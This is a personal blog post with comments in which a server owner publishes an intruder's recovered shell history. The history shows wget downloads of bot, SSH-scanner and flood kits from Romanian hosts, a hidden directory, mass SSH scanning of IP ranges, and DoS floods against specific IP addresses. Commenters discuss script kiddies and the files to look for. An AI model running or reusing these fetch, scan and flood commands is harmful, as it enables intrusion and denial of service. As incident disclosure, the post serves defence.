So it looks like my boy is Greek. He logged in from several places, but the majority of them came from here:
athe530-q107.otenet.gr
athe530-q107.otenet.gr
athe530-t139.otenet.gr
athe530-p167.otenet.gr
athe530-a086.otenet.gr
athe530-q183.otenet.gr
athe530-u145.otenet.gr
athe530-p121.otenet.gr
athe530-u027.otenet.gr
athe530-u027.otenet.gr
athe530-u027.otenet.gr
athe530-p124.otenet.gr
athe530-o160.otenet.gr
athe530-o160.otenet.gr
It’s an ISP in Athens.
He didn’t delete his .bash_history so I got it all. Here it is:
w
cat /etc/issue
passwd
cd /var/tmp
mkdir .mi
cd .mi
mkdir " "
cd " "
wget www.mande.as.ro/wow.tgz
tar xzvf wow.tgz
rm -rf wow.tgz
wget chebeleu.com/local
rm -rf local
wget fudje.home.ro/bot.tar.gz
tar xzvf bot.tar.gz
rm -rf bot.tar.gz
cd bot
vi mech.set
vi emech.users
./mech
./mech
w
cd ..
cd ssh
./assh 24.68
./assh 24.89
./assh 24.22
./assh 24.134
cd ..
rm -rf ssh
cd *
cd ..
cd ..
cd ..
cd ..
cd ..
cd .
cd /tmp
wget www.mande.as.ro/wow.tgz
wget [james@dhcppc3 tmp]$ wget www.mande.as.ro/wow.tgz
wget www.mande.as.ro/wow.tgz
wget www.mande.as.ro/wow.tgz
ls
rm -rf wow.tgz
cd ssh
./assh 66.0
./assh 24.21
exit exit
cd /var/tmp/.mi/" "
ls
cd bot
./mech
./mech
ls
cd ..
ls
wget fudje.home.ro/flood.tgz
tar xzvf flood.tgz
rm -rf flood.tgz
cd flood
cd ..
cd ..
cd ..
cd ..
w
cd /tmp
ls
cd ssh
./assh 212.76
./assh 216.2
./assh 216.211
cd ..
ls
rm -rf ssh
wget www.mande.as.ro/wow.tgz
tar -zxvf wow.tgz
cd ssh
./assh 61.119
exit
exit
cd /tmp
cd ssh
./assh 24.21
./assh 212.45
./assh 210.100
./assh 210.98
cd /tmp
cd ssh
./assh 61.73
./assh 66.19
./assh 138.4
./assh 219.99
cd /tmp
wget fudje.home.ro/flood.tgz
tar xzvf flood.tgz
rm -rf flood.tgz
cd flood
./stealth 66.90.107.116 80
./stealth 66.90.107.116 80
exit
exit
cd /tmp
ls
w
cd ssh
./assh 139.9
./assh 139.102
./assh 80.181
./assh 61.13
cd /tmp
cd flood
./stealth 83.103.191.119 80
cd /tmp
cd flood
./stealth 217.79.69.226 80
w
cd /tmp
cd flood
./stealth 83.103.191.119 80
w
passwd
w
exity
exit
cd /tmp
cd ssh
./assh 24.9
./assh 210.3
cd ..
cd flood
./stealth 81.3.8.130 80
cd /tmp
ls
cd flood
./stealth 202.169.51.114
./stealth 202.169.51.114 80
w
./stealth 202.169.51.114 80
./stealth 202.169.51.114 80
./stealth 202.169.51.114 80
cd /tmp
wget nechi.home.ro/PHP.tar
rm -rf no_user.phtml
wget nechi.home.ro/vadim.tar
rm -rf no_user.phtml
cd flood
./stealth 83.103.191.134 80
cd /tmp
cd flood
./stealth 81.3.8.130 80
./stealth 83.103.191.119 80
cd /tmp
cd flood
./stealth 82.48.52.229 80
More as I learn it.
d00d, j00 g07 sk00l3d by an 31337 $cr1p7 k1dd1e. j00 b0x0r b33n r3w73d!
Heh. Actually, it really does look like a script kiddie got lucky and just happened to find an otherwise secure box and was able to login due to a silly oversight on your part. It does not appear that he gained local root privileges.
Yeah, it actually looks like he didn’t care about root, or stealing anything. He just wanted a bot in place for DDOS use. Since he was so simple in his work, it’s entirely possible he didn’t even think about it. He just did what his boss told him, “gain access, install this software, get out”.
i thinck the boy it smart.first of all he scaned your pc who is vulnerable and did what a craker do an psybnc/emech (bot).What he did it nothing hard you are lucky next time be more carefull
haha cute .. if he’s from greek why he seems to use all those .ro domains … i’m sure he fooled u at the end
Oh yes, very clever, I’m sure he fooled me.
romanians are very good at this things..a lot o romanian are doing same thing,is just a game for us..
Hmm.. i am a romanian, let me tell u something.. he entered onto your box because an easy cracked ssh password or by the smbd exploit… look that he killed the smnd and nmbd processes… more often now they get in by the php scripts running onto your boxes…
this is just a script kiddie who did some emechs to be “cool” onto undernet… then, when somebody bothered him.. used your box to flood that person..
they are with thousands in romania like this.. u must secure your passwords and be carefoul about some existence of mech.set , psybnc.conf or eggdrop.conf … this are the files witch u will find onto almost every box they hack!
if you want more info send me a mail!
hahaha..its nothing important..He just wanted to put some emech for mirc and as I saw he was using your machine to scan (to crack another boxes) like he cracked yours. Its nothing serious..he is simple boy who has a scan archieve and he thinks he is a hacker/cracker..bullshit. I was doing that when I was 15
i didn’t read any of the comments. i asure you it’s a romanian little kiddie hacker :)))